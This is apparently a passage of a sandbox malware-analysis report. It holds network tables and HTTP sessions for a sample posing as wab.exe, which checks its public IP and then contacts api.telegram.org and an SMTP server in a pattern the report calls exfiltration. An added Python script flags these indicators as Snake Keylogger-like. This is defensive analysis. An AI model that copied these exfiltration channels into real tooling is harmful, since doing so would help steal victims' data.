                                              Jul 25, 2024 10:06:20.348258972 CEST4972580192.168.2.8193.122.6.168
                                              Jul 25, 2024 10:06:20.352453947 CEST8049723193.122.6.168192.168.2.8
                                              Jul 25, 2024 10:06:20.352531910 CEST4972380192.168.2.8193.122.6.168
                                              Jul 25, 2024 10:06:20.353033066 CEST8049725193.122.6.168192.168.2.8
                                              Jul 25, 2024 10:06:20.353104115 CEST4972580192.168.2.8193.122.6.168
                                              Jul 25, 2024 10:06:20.353204012 CEST4972580192.168.2.8193.122.6.168
                                              Jul 25, 2024 10:06:20.357994080 CEST8049725193.122.6.168192.168.2.8
                                              Jul 25, 2024 10:06:23.382668972 CEST8049725193.122.6.168192.168.2.8
                                              Jul 25, 2024 10:06:23.384078026 CEST49726443192.168.2.8188.114.96.3
                                              Jul 25, 2024 10:06:23.384118080 CEST44349726188.114.96.3192.168.2.8
                                              Jul 25, 2024 10:06:23.384355068 CEST49726443192.168.2.8188.114.96.3
                                              Jul 25, 2024 10:06:23.384448051 CEST49726443192.168.2.8188.114.96.3
                                              Jul 25, 2024 10:06:23.384464979 CEST44349726188.114.96.3192.168.2.8
                                              Jul 25, 2024 10:06:23.427577972 CEST4972580192.168.2.8193.122.6.168
                                              Jul 25, 2024 10:06:23.879322052 CEST44349726188.114.96.3192.168.2.8
                                              Jul 25, 2024 10:06:23.881793976 CEST49726443192.168.2.8188.114.96.3
                                              Jul 25, 2024 10:06:23.881819963 CEST44349726188.114.96.3192.168.2.8
                                              Jul 25, 2024 10:06:24.014363050 CEST44349726188.114.96.3192.168.2.8
                                              Jul 25, 2024 10:06:24.014492989 CEST44349726188.114.96.3192.168.2.8
                                              Jul 25, 2024 10:06:24.014619112 CEST49726443192.168.2.8188.114.96.3
                                              Jul 25, 2024 10:06:24.015167952 CEST49726443192.168.2.8188.114.96.3
                                              Jul 25, 2024 10:06:24.034341097 CEST4972580192.168.2.8193.122.6.168
                                              Jul 25, 2024 10:06:24.046267986 CEST8049725193.122.6.168192.168.2.8
Jul 25, 2024 10:06:24.046668053 CEST  49727  443  192.168.2.8  149.154.167.220
Jul 25, 2024 10:06:24.046688080 CEST  49725  80  192.168.2.8  193.122.6.168
Jul 25, 2024 10:06:24.046756029 CEST  443  49727  149.154.167.220  192.168.2.8
Jul 25, 2024 10:06:24.050075054 CEST  49727  443  192.168.2.8  149.154.167.220
Jul 25, 2024 10:06:24.050621033 CEST  49727  443  192.168.2.8  149.154.167.220
Jul 25, 2024 10:06:24.050652027 CEST  443  49727  149.154.167.220  192.168.2.8
Jul 25, 2024 10:06:24.729830980 CEST  443  49727  149.154.167.220  192.168.2.8
Jul 25, 2024 10:06:24.729953051 CEST  49727  443  192.168.2.8  149.154.167.220
Jul 25, 2024 10:06:24.731921911 CEST  49727  443  192.168.2.8  149.154.167.220
Jul 25, 2024 10:06:24.731954098 CEST  443  49727  149.154.167.220  192.168.2.8
Jul 25, 2024 10:06:24.732430935 CEST  443  49727  149.154.167.220  192.168.2.8
Jul 25, 2024 10:06:24.738327980 CEST  49727  443  192.168.2.8  149.154.167.220
Jul 25, 2024 10:06:24.780503035 CEST  443  49727  149.154.167.220  192.168.2.8
Jul 25, 2024 10:06:24.998481989 CEST  443  49727  149.154.167.220  192.168.2.8
Jul 25, 2024 10:06:24.998558998 CEST  443  49727  149.154.167.220  192.168.2.8
Jul 25, 2024 10:06:24.998631954 CEST  49727  443  192.168.2.8  149.154.167.220
Jul 25, 2024 10:06:25.007286072 CEST  49727  443  192.168.2.8  149.154.167.220
Jul 25, 2024 10:06:30.846798897 CEST  49714  80  192.168.2.8  193.122.6.168
Jul 25, 2024 10:06:31.515412092 CEST  49728  587  192.168.2.8  192.185.142.133
Jul 25, 2024 10:06:31.520282030 CEST  587  49728  192.185.142.133  192.168.2.8
Jul 25, 2024 10:06:31.520754099 CEST  49728  587  192.168.2.8  192.185.142.133
Jul 25, 2024 10:06:32.061460972 CEST  587  49728  192.185.142.133  192.168.2.8
Jul 25, 2024 10:06:32.061825037 CEST  49728  587  192.168.2.8  192.185.142.133
Jul 25, 2024 10:06:32.066833019 CEST  587  49728  192.185.142.133  192.168.2.8
Jul 25, 2024 10:06:32.180141926 CEST  587  49728  192.185.142.133  192.168.2.8
Jul 25, 2024 10:06:32.180402040 CEST  49728  587  192.168.2.8  192.185.142.133
Jul 25, 2024 10:06:32.185290098 CEST  587  49728  192.185.142.133  192.168.2.8
Jul 25, 2024 10:06:32.299238920 CEST  587  49728  192.185.142.133  192.168.2.8
Jul 25, 2024 10:06:32.299866915 CEST  49728  587  192.168.2.8  192.185.142.133
Jul 25, 2024 10:06:32.304783106 CEST  587  49728  192.185.142.133  192.168.2.8
Jul 25, 2024 10:06:32.438194990 CEST  587  49728  192.185.142.133  192.168.2.8
Jul 25, 2024 10:06:32.438303947 CEST  587  49728  192.185.142.133  192.168.2.8
Jul 25, 2024 10:06:32.438322067 CEST  587  49728  192.185.142.133  192.168.2.8
Jul 25, 2024 10:06:32.438390017 CEST  49728  587  192.168.2.8  192.185.142.133
Jul 25, 2024 10:06:32.456649065 CEST  49728  587  192.168.2.8  192.185.142.133
Jul 25, 2024 10:06:32.463782072 CEST  587  49728  192.185.142.133  192.168.2.8
Jul 25, 2024 10:06:32.579771042 CEST  587  49728  192.185.142.133  192.168.2.8
Jul 25, 2024 10:06:32.583622932 CEST  49728  587  192.168.2.8  192.185.142.133
Jul 25, 2024 10:06:32.588675022 CEST  587  49728  192.185.142.133  192.168.2.8
Jul 25, 2024 10:06:32.702629089 CEST  587  49728  192.185.142.133  192.168.2.8
Jul 25, 2024 10:06:32.703121901 CEST  49728  587  192.168.2.8  192.185.142.133
Jul 25, 2024 10:06:32.708734035 CEST  587  49728  192.185.142.133  192.168.2.8
Jul 25, 2024 10:06:32.823009014 CEST  587  49728  192.185.142.133  192.168.2.8
Jul 25, 2024 10:06:32.823415041 CEST  49728  587  192.168.2.8  192.185.142.133
Jul 25, 2024 10:06:32.828989029 CEST  587  49728  192.185.142.133  192.168.2.8
Jul 25, 2024 10:06:33.061333895 CEST  587  49728  192.185.142.133  192.168.2.8
Jul 25, 2024 10:06:33.061670065 CEST  49728  587  192.168.2.8  192.185.142.133
Jul 25, 2024 10:06:33.067259073 CEST  587  49728  192.185.142.133  192.168.2.8
Jul 25, 2024 10:06:33.180284977 CEST  587  49728  192.185.142.133  192.168.2.8
Jul 25, 2024 10:06:33.180633068 CEST  49728  587  192.168.2.8  192.185.142.133
Jul 25, 2024 10:06:33.185616970 CEST  587  49728  192.185.142.133  192.168.2.8
Jul 25, 2024 10:06:33.359177113 CEST  587  49728  192.185.142.133  192.168.2.8
Jul 25, 2024 10:06:33.359477997 CEST  49728  587  192.168.2.8  192.185.142.133
Jul 25, 2024 10:06:33.364331007 CEST  587  49728  192.185.142.133  192.168.2.8
Jul 25, 2024 10:06:33.477018118 CEST  587  49728  192.185.142.133  192.168.2.8
Jul 25, 2024 10:06:33.479979038 CEST  49728  587  192.168.2.8  192.185.142.133
Jul 25, 2024 10:06:33.479979038 CEST  49728  587  192.168.2.8  192.185.142.133
Jul 25, 2024 10:06:33.480035067 CEST  49728  587  192.168.2.8  192.185.142.133
Jul 25, 2024 10:06:33.480035067 CEST  49728  587  192.168.2.8  192.185.142.133
Jul 25, 2024 10:06:33.484807968 CEST  587  49728  192.185.142.133  192.168.2.8
Jul 25, 2024 10:06:33.484869003 CEST  587  49728  192.185.142.133  192.168.2.8
Jul 25, 2024 10:06:33.484898090 CEST  587  49728  192.185.142.133  192.168.2.8
Jul 25, 2024 10:06:33.487011909 CEST  587  49728  192.185.142.133  192.168.2.8
Jul 25, 2024 10:06:33.658339024 CEST  587  49728  192.185.142.133  192.168.2.8
Jul 25, 2024 10:06:33.709018946 CEST  49728  587  192.168.2.8  192.185.142.133
Jul 25, 2024 10:06:35.173379898 CEST  49728  587  192.168.2.8  192.185.142.133
Jul 25, 2024 10:06:35.178626060 CEST  587  49728  192.185.142.133  192.168.2.8
Jul 25, 2024 10:06:35.291187048 CEST  587  49728  192.185.142.133  192.168.2.8
Jul 25, 2024 10:06:35.291659117 CEST  49728  587  192.168.2.8  192.185.142.133
Jul 25, 2024 10:06:35.292722940 CEST  49729  587  192.168.2.8  192.185.142.133
Jul 25, 2024 10:06:35.297575951 CEST  587  49729  192.185.142.133  192.168.2.8
Jul 25, 2024 10:06:35.297650099 CEST  49729  587  192.168.2.8  192.185.142.133
Jul 25, 2024 10:06:35.852786064 CEST  587  49729  192.185.142.133  192.168.2.8
Jul 25, 2024 10:06:35.852926016 CEST  49729  587  192.168.2.8  192.185.142.133
Jul 25, 2024 10:06:35.859675884 CEST  587  49729  192.185.142.133  192.168.2.8
Jul 25, 2024 10:06:35.995678902 CEST  587  49729  192.185.142.133  192.168.2.8
Jul 25, 2024 10:06:35.995861053 CEST  49729  587  192.168.2.8  192.185.142.133
Jul 25, 2024 10:06:36.000802040 CEST  587  49729  192.185.142.133  192.168.2.8
Jul 25, 2024 10:06:36.114645958 CEST  587  49729  192.185.142.133  192.168.2.8
Jul 25, 2024 10:06:36.161968946 CEST  49729  587  192.168.2.8  192.185.142.133
Jul 25, 2024 10:06:38.447910070 CEST  49729  587  192.168.2.8  192.185.142.133
Jul 25, 2024 10:06:38.453664064 CEST  587  49729  192.185.142.133  192.168.2.8
Jul 25, 2024 10:06:38.577277899 CEST  587  49729  192.185.142.133  192.168.2.8
Jul 25, 2024 10:06:38.577305079 CEST  587  49729  192.185.142.133  192.168.2.8
Jul 25, 2024 10:06:38.577361107 CEST  49729  587  192.168.2.8  192.185.142.133
Jul 25, 2024 10:06:38.577434063 CEST  587  49729  192.185.142.133  192.168.2.8
Jul 25, 2024 10:06:38.577445984 CEST  587  49729  192.185.142.133  192.168.2.8
Jul 25, 2024 10:06:38.577480078 CEST  49729  587  192.168.2.8  192.185.142.133
Jul 25, 2024 10:06:38.578682899 CEST  49729  587  192.168.2.8  192.185.142.133
Jul 25, 2024 10:06:38.583623886 CEST  587  49729  192.185.142.133  192.168.2.8
Jul 25, 2024 10:06:38.692044020 CEST  587  49729  192.185.142.133  192.168.2.8
Jul 25, 2024 10:06:38.693525076 CEST  49729  587  192.168.2.8  192.185.142.133
Jul 25, 2024 10:06:38.698523045 CEST  587  49729  192.185.142.133  192.168.2.8
Jul 25, 2024 10:06:38.806349993 CEST  587  49729  192.185.142.133  192.168.2.8
Jul 25, 2024 10:06:38.806636095 CEST  49729  587  192.168.2.8  192.185.142.133
Jul 25, 2024 10:06:38.812079906 CEST  587  49729  192.185.142.133  192.168.2.8
Jul 25, 2024 10:06:38.919759035 CEST  587  49729  192.185.142.133  192.168.2.8
Jul 25, 2024 10:06:38.920049906 CEST  49729  587  192.168.2.8  192.185.142.133
Jul 25, 2024 10:06:38.924931049 CEST  587  49729  192.185.142.133  192.168.2.8
Jul 25, 2024 10:06:39.035254955 CEST  587  49729  192.185.142.133  192.168.2.8
Jul 25, 2024 10:06:39.035578966 CEST  49729  587  192.168.2.8  192.185.142.133
Jul 25, 2024 10:06:39.040709019 CEST  587  49729  192.185.142.133  192.168.2.8
Jul 25, 2024 10:06:39.179364920 CEST  587  49729  192.185.142.133  192.168.2.8
Jul 25, 2024 10:06:39.179549932 CEST  49729  587  192.168.2.8  192.185.142.133
Jul 25, 2024 10:06:39.187886000 CEST  587  49729  192.185.142.133  192.168.2.8
Jul 25, 2024 10:06:39.356656075 CEST  587  49729  192.185.142.133  192.168.2.8
Jul 25, 2024 10:06:39.411967993 CEST  49729  587  192.168.2.8  192.185.142.133
Timestamp  Source Port  Dest Port  Source IP  Dest IP
Jul 25, 2024 10:05:55.134043932 CEST  61822  53  192.168.2.8  1.1.1.1
Jul 25, 2024 10:05:55.345859051 CEST  53  61822  1.1.1.1  192.168.2.8
Jul 25, 2024 10:05:56.745920897 CEST  56138  53  192.168.2.8  1.1.1.1
Jul 25, 2024 10:05:56.755285025 CEST  53  56138  1.1.1.1  192.168.2.8
Jul 25, 2024 10:06:00.581677914 CEST  54988  53  192.168.2.8  1.1.1.1
Jul 25, 2024 10:06:00.590179920 CEST  53  54988  1.1.1.1  192.168.2.8
Jul 25, 2024 10:06:24.035109997 CEST  58657  53  192.168.2.8  1.1.1.1
Jul 25, 2024 10:06:24.042309999 CEST  53  58657  1.1.1.1  192.168.2.8
Jul 25, 2024 10:06:31.098274946 CEST  64819  53  192.168.2.8  1.1.1.1
Jul 25, 2024 10:06:31.511082888 CEST  53  64819  1.1.1.1  192.168.2.8
Timestamp  Source IP  Dest IP  Trans ID  OP Code  Name  Type  Class  DNS over HTTPS
Jul 25, 2024 10:05:55.134043932 CEST  192.168.2.8  1.1.1.1  0x9f5  Standard query (0)  www.reap.skyestates.com.mt  A (IP address)  IN (0x0001)  false
Jul 25, 2024 10:05:56.745920897 CEST  192.168.2.8  1.1.1.1  0x67fe  Standard query (0)  checkip.dyndns.org  A (IP address)  IN (0x0001)  false
Jul 25, 2024 10:06:00.581677914 CEST  192.168.2.8  1.1.1.1  0xcbca  Standard query (0)  reallyfreegeoip.org  A (IP address)  IN (0x0001)  false
Jul 25, 2024 10:06:24.035109997 CEST  192.168.2.8  1.1.1.1  0x647a  Standard query (0)  api.telegram.org  A (IP address)  IN (0x0001)  false
Jul 25, 2024 10:06:31.098274946 CEST  192.168.2.8  1.1.1.1  0x24cd  Standard query (0)  mail.electromac.com.bo  A (IP address)  IN (0x0001)  false
Timestamp  Source IP  Dest IP  Trans ID  Reply Code  Name  CName  Address  Type  Class  DNS over HTTPS
Jul 25, 2024 10:05:55.345859051 CEST  1.1.1.1  192.168.2.8  0x9f5  No error (0)  www.reap.skyestates.com.mt  -  108.167.181.251  A (IP address)  IN (0x0001)  false
Jul 25, 2024 10:05:56.755285025 CEST  1.1.1.1  192.168.2.8  0x67fe  No error (0)  checkip.dyndns.org  checkip.dyndns.com  -  CNAME (Canonical name)  IN (0x0001)  false
Jul 25, 2024 10:05:56.755285025 CEST  1.1.1.1  192.168.2.8  0x67fe  No error (0)  checkip.dyndns.com  -  193.122.6.168  A (IP address)  IN (0x0001)  false
Jul 25, 2024 10:05:56.755285025 CEST  1.1.1.1  192.168.2.8  0x67fe  No error (0)  checkip.dyndns.com  -  193.122.130.0  A (IP address)  IN (0x0001)  false
Jul 25, 2024 10:05:56.755285025 CEST  1.1.1.1  192.168.2.8  0x67fe  No error (0)  checkip.dyndns.com  -  132.226.247.73  A (IP address)  IN (0x0001)  false
Jul 25, 2024 10:05:56.755285025 CEST  1.1.1.1  192.168.2.8  0x67fe  No error (0)  checkip.dyndns.com  -  158.101.44.242  A (IP address)  IN (0x0001)  false
Jul 25, 2024 10:05:56.755285025 CEST  1.1.1.1  192.168.2.8  0x67fe  No error (0)  checkip.dyndns.com  -  132.226.8.169  A (IP address)  IN (0x0001)  false
Jul 25, 2024 10:06:00.590179920 CEST  1.1.1.1  192.168.2.8  0xcbca  No error (0)  reallyfreegeoip.org  -  188.114.96.3  A (IP address)  IN (0x0001)  false
Jul 25, 2024 10:06:00.590179920 CEST  1.1.1.1  192.168.2.8  0xcbca  No error (0)  reallyfreegeoip.org  -  188.114.97.3  A (IP address)  IN (0x0001)  false
Jul 25, 2024 10:06:24.042309999 CEST  1.1.1.1  192.168.2.8  0x647a  No error (0)  api.telegram.org  -  149.154.167.220  A (IP address)  IN (0x0001)  false
Jul 25, 2024 10:06:31.511082888 CEST  1.1.1.1  192.168.2.8  0x24cd  No error (0)  mail.electromac.com.bo  electromac.com.bo  -  CNAME (Canonical name)  IN (0x0001)  false
Jul 25, 2024 10:06:31.511082888 CEST  1.1.1.1  192.168.2.8  0x24cd  No error (0)  electromac.com.bo  -  192.185.142.133  A (IP address)  IN (0x0001)  false
                                              • www.reap.skyestates.com.mt
                                              • reallyfreegeoip.org
                                              • api.telegram.org
                                              • checkip.dyndns.org
Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
0  192.168.2.8  49711  193.122.6.168  80  1372  C:\Program Files (x86)\Windows Mail\wab.exe
Timestamp  Bytes transferred  Direction  Data
Jul 25, 2024 10:05:56.773919106 CEST  151  OUT  GET / HTTP/1.1
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                              Host: checkip.dyndns.org
                                              Connection: Keep-Alive
Jul 25, 2024 10:05:58.761697054 CEST  320  IN  HTTP/1.1 200 OK
                                              Date: Thu, 25 Jul 2024 08:05:58 GMT
                                              Content-Type: text/html
                                              Content-Length: 103
                                              Connection: keep-alive
                                              Cache-Control: no-cache
                                              Pragma: no-cache
                                              X-Request-ID: 1b546ee1cc4e846be48d67f1241c6281
                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
Jul 25, 2024 10:05:58.765474081 CEST  127  OUT  GET / HTTP/1.1
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                              Host: checkip.dyndns.org
Jul 25, 2024 10:06:00.152548075 CEST  320  IN  HTTP/1.1 200 OK
                                              Date: Thu, 25 Jul 2024 08:06:00 GMT
                                              Content-Type: text/html
                                              Content-Length: 103
                                              Connection: keep-alive
                                              Cache-Control: no-cache
                                              Pragma: no-cache
                                              X-Request-ID: 3be6f1c5753cb573f775a92bab12a95f
                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
Jul 25, 2024 10:06:01.381910086 CEST  127  OUT  GET / HTTP/1.1
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                              Host: checkip.dyndns.org
Jul 25, 2024 10:06:03.976849079 CEST  320  IN  HTTP/1.1 200 OK
                                              Date: Thu, 25 Jul 2024 08:06:03 GMT
                                              Content-Type: text/html
                                              Content-Length: 103
                                              Connection: keep-alive
                                              Cache-Control: no-cache
                                              Pragma: no-cache
                                              X-Request-ID: 2cc218477ad0c3086a50088c056cd79f
                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
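
The tables above show the full exfiltration profile of this sample in one place: an external IP lookup against checkip.dyndns.org with a hard-coded MSIE 6.0 User-Agent, issued by wab.exe rather than a browser; a reallyfreegeoip.org lookup; a TLS session to api.telegram.org (149.154.167.220:443); and SMTP submission to mail.electromac.com.bo (192.185.142.133:587). The following triage script is an added example and is not Joe Sandbox code. It takes per-host records in the shape these tables show, extracts the leaked public IP from the checkip body (and tolerates the 502 page seen in session 5), and only returns a Snake Keylogger-style verdict when the IP check from a non-browser process is paired with a Telegram or SMTP exfil channel, because the IP check alone is also issued by plenty of legitimate software. The record classes, function names, the browser allow-list and the hand-assembled sample data are all assumptions made for this example; the TCP table does not attribute the 443 and 587 flows to a process, so flows are modelled without one.

```python
"""Triage a sandbox network profile for the Snake Keylogger exfil chain.

Added example, not Joe Sandbox code. Records are hand-built from the DNS,
TCP and HTTP tables of the report; names, classes and thresholds are
assumptions for illustration.
"""
import re
from dataclasses import dataclass, field

# User-Agent string observed verbatim in the wab.exe requests above.
LEGACY_UA = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)"
IP_CHECK_HOSTS = {"checkip.dyndns.org", "checkip.dyndns.com"}
GEOIP_HOSTS = {"reallyfreegeoip.org"}
# Assumed allow-list: a browser asking "what is my IP" is not interesting.
BROWSERS = {"chrome.exe", "msedge.exe", "firefox.exe", "iexplore.exe"}
_IP_RE = re.compile(r"Current IP Address:\s*(\d{1,3}(?:\.\d{1,3}){3})")

# Response bodies copied from the report (the 502 body is shortened).
CHECKIP_200_BODY = ("<html><head><title>Current IP Check</title></head>"
                    "<body>Current IP Address: 8.46.123.33</body></html>")
CHECKIP_502_BODY = ("<html><head><title>502 Bad Gateway</title></head>"
                    "<body><center><h1>502 Bad Gateway</h1></center></body></html>")


@dataclass
class HttpTxn:
    process: str
    host: str
    user_agent: str
    status: int
    body: str = ""


@dataclass
class NetProfile:
    dns: dict = field(default_factory=dict)    # name -> set of IPv4s (CNAMEs followed)
    http: list = field(default_factory=list)   # HttpTxn records
    flows: list = field(default_factory=list)  # (dst_ip, dst_port) tuples


def parse_checkip_body(body):
    """Return the public IP echoed by the checkip service, or None for error pages."""
    m = _IP_RE.search(body)
    return m.group(1) if m else None


def _flow_to(profile, name, port):
    """True if any TCP flow went to an IP that `name` resolved to, on `port`."""
    ips = profile.dns.get(name, set())
    return any(ip in ips and p == port for ip, p in profile.flows)


def score(profile):
    """Collect indicators and derive a verdict; each key is one observed behaviour."""
    hits = {}
    for t in profile.http:
        if t.host in IP_CHECK_HOSTS and t.process.lower() not in BROWSERS:
            hits["ip_check_from_non_browser"] = t.process
            if t.user_agent == LEGACY_UA:
                hits["legacy_msie_ua"] = True
            ip = parse_checkip_body(t.body) if t.status == 200 else None
            if ip:
                hits.setdefault("leaked_public_ip", ip)
    if any(n in profile.dns for n in GEOIP_HOSTS):
        hits["geoip_lookup"] = True
    if _flow_to(profile, "api.telegram.org", 443):
        hits["telegram_api"] = True
    smtp = [n for n in profile.dns
            if n.startswith("mail.") and any(_flow_to(profile, n, p) for p in (25, 465, 587))]
    if smtp:
        hits["smtp_submission"] = smtp[0]
    exfil = {"telegram_api", "smtp_submission"} & set(hits)
    hits["verdict"] = ("snake_keylogger_like"
                       if "ip_check_from_non_browser" in hits and exfil else "inconclusive")
    return hits


def build_report_profile():
    """Profile assembled by hand from the report's DNS answers, TCP flows and HTTP sessions."""
    return NetProfile(
        dns={
            "www.reap.skyestates.com.mt": {"108.167.181.251"},
            "checkip.dyndns.org": {"193.122.6.168", "193.122.130.0", "132.226.247.73",
                                   "158.101.44.242", "132.226.8.169"},
            "reallyfreegeoip.org": {"188.114.96.3", "188.114.97.3"},
            "api.telegram.org": {"149.154.167.220"},
            "mail.electromac.com.bo": {"192.185.142.133"},
        },
        http=[
            HttpTxn("wab.exe", "checkip.dyndns.org", LEGACY_UA, 200, CHECKIP_200_BODY),
            HttpTxn("wab.exe", "checkip.dyndns.org", LEGACY_UA, 502, CHECKIP_502_BODY),
        ],
        flows=[("193.122.6.168", 80), ("149.154.167.220", 443), ("192.185.142.133", 587)],
    )


if __name__ == "__main__":
    for k, v in score(build_report_profile()).items():
        print(f"{k}: {v}")
```

The same `score` function returns `inconclusive` for a profile in which only a browser touched checkip.dyndns.org and no Telegram or mail flow is present, which is the false-positive case a detection on this page's indicators must survive. In a real deployment the DNS map would come from the resolver log or Zeek `dns.log`, the flows from `conn.log`, and the HTTP records from a proxy that records the originating process, as the sandbox does here.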


Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
1  192.168.2.8  49714  193.122.6.168  80  1372  C:\Program Files (x86)\Windows Mail\wab.exe
Timestamp  Bytes transferred  Direction  Data
Jul 25, 2024 10:06:04.619803905 CEST  127  OUT  GET / HTTP/1.1
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                              Host: checkip.dyndns.org
Jul 25, 2024 10:06:05.580435991 CEST  320  IN  HTTP/1.1 200 OK
                                              Date: Thu, 25 Jul 2024 08:06:05 GMT
                                              Content-Type: text/html
                                              Content-Length: 103
                                              Connection: keep-alive
                                              Cache-Control: no-cache
                                              Pragma: no-cache
                                              X-Request-ID: c78a6676b2fdb80077fb3d0691f11816
                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
Jul 25, 2024 10:06:05.635086060 CEST  320  IN  HTTP/1.1 200 OK
                                              Date: Thu, 25 Jul 2024 08:06:05 GMT
                                              Content-Type: text/html
                                              Content-Length: 103
                                              Connection: keep-alive
                                              Cache-Control: no-cache
                                              Pragma: no-cache
                                              X-Request-ID: c78a6676b2fdb80077fb3d0691f11816
                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
2  192.168.2.8  49716  193.122.6.168  80  1372  C:\Program Files (x86)\Windows Mail\wab.exe
Timestamp  Bytes transferred  Direction  Data
Jul 25, 2024 10:06:06.267836094 CEST  151  OUT  GET / HTTP/1.1
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                              Host: checkip.dyndns.org
                                              Connection: Keep-Alive
Jul 25, 2024 10:06:06.897126913 CEST  320  IN  HTTP/1.1 200 OK
                                              Date: Thu, 25 Jul 2024 08:06:06 GMT
                                              Content-Type: text/html
                                              Content-Length: 103
                                              Connection: keep-alive
                                              Cache-Control: no-cache
                                              Pragma: no-cache
                                              X-Request-ID: ccacc07ff9f7cb8fcb876f6ba40cfa25
                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
3  192.168.2.8  49718  193.122.6.168  80  1372  C:\Program Files (x86)\Windows Mail\wab.exe
Timestamp  Bytes transferred  Direction  Data
Jul 25, 2024 10:06:07.591886044 CEST  151  OUT  GET / HTTP/1.1
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                              Host: checkip.dyndns.org
                                              Connection: Keep-Alive
Jul 25, 2024 10:06:12.174505949 CEST  320  IN  HTTP/1.1 200 OK
                                              Date: Thu, 25 Jul 2024 08:06:12 GMT
                                              Content-Type: text/html
                                              Content-Length: 103
                                              Connection: keep-alive
                                              Cache-Control: no-cache
                                              Pragma: no-cache
                                              X-Request-ID: c39645c03b8772f6c9dcbe28522f3246
                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
4  192.168.2.8  49720  193.122.6.168  80  1372  C:\Program Files (x86)\Windows Mail\wab.exe
Timestamp  Bytes transferred  Direction  Data
Jul 25, 2024 10:06:12.857552052 CEST  151  OUT  GET / HTTP/1.1
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                              Host: checkip.dyndns.org
